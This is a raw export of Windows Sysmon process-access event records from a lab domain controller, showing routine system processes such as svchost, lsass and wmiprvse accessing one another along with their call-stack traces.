13:55:23.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006683Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:23.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006682Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:23.141{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006681Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:23.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006680Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:23.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006679Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:23.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006678Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:23.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006677Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:23.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006676Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:23.094{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006675Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:23.079{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006674Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:23.079{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006673Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:23.079{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006693Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:24.281{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006692Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:24.281{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006691Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:24.281{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006690Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:24.281{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006689Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:24.281{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006688Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:24.281{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006687Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:24.265{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006686Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:24.265{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006685Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:24.265{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006706Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.684{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85D0-5FCF-0001-000000009101}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006705Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.684{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006704Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.684{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006703Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.684{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006702Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 